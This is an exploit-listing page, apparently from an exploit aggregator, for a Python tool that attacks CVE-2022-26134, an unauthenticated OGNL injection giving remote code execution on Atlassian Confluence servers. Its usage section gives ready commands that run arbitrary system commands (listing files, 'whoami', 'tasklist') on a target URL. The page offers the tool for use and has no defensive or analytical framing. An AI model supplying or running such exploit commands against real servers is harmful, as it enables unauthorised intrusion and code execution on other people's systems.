Exploit for Expression Language Injection in Atlassian Confluence Data Center CVE-2022-26134

Name: Exploit for Expression Language Injection in Atlassian Confluence Data Center CVE-2022-26134
Rating: 5 (146 reviews)

2022-06-04 | CVSS 7.5

## https://sploitus.com/exploit?id=305ADB34-3669-5AAD-8D51-FCFFEF9E3F47
# CVE-2022-26134
（CVE-2022-26134）an unauthenticated and remote OGNL injection vulnerability resulting in code execution in the context of the Confluence server



Require：Python2 or Python3

Usage:

```
python cve_2022_26134.py -url target_url -cmd "ls -al"
python cve_2022_26134.py -url target_url -cmd "whoami"
```



![](1.png)

if target is windows system, please use the script as follows, for example:

```
python3 cve_2022_26134.py -url target_url -cmd "cmd /c tasklist"
```

![](https://user-images.githubusercontent.com/30258075/172058512-32221924-4ee9-450d-9139-19ebd8e1b396.png)